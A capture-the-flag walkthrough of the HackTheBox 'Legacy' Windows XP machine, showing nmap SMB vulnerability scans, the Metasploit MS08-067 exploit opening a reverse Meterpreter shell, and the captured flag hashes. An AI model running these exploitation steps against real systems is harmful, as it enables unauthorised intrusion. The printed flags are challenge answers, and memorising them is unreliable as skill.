As the oldest machine on HackTheBox, i thought Legacy would be the perfect machine to start with. It was a nice and easy first box - requiring simple enumeration following a simple SMB vulnerability exploit to gain root access.
Machine IP = 10.10.10.4
RECON AND INFORMATION GATHERING
Nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 12:04 BST Nmap scan report for 10.10.10.4 Host is up (0.055s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h31m22s, deviation: 2h07m16s, median: 4d23h01m22s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:b9:47:5e (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2020-07-24T16:05:41+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.16 seconds
An old machine, running Windows XP 2000. SMB is discovered on port 139. Time to delve deeper. Scan for SMB vulnerabilities on port 139.
root@kali:~# nmap --script smb-vuln* -p 139 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 12:23 BST Nmap scan report for 10.10.10.4 Host is up (0.052s latency). PORT STATE SERVICE 139/tcp open netbios-ssn Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Two CVE’s returned:
- CVE-2008-4250 - smb-vuln-ms08-067
- CVE-2017-0143 - smb-vuln-ms17-010
Now onto Metasploit to gain access to machine.
Exploiting
Metasploit
msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file: path' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4 RHOSTS => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 10.10.14.13:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2020-07-19 12:31:48 +0100 meterpreter > meterpreter > sysinfo Computer : LEGACY OS : Windows XP (5.1 Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 1 Meterpreter : x86/windows
It seems we have access to the machine! Time to find some flags.
C:\Documents and Settings\john\Desktop>type user.txt e69af0e4f443de7e36876fda4ec7644f C:\Documents and Settings\Administrator\Desktop>type root.txt 993442d258b0e0ec917cae9e695d5713
First machine completed! Although there is another option to exloit via ms17-010, the results would be the same. Was a nice easy machine to say the least. Onto the next!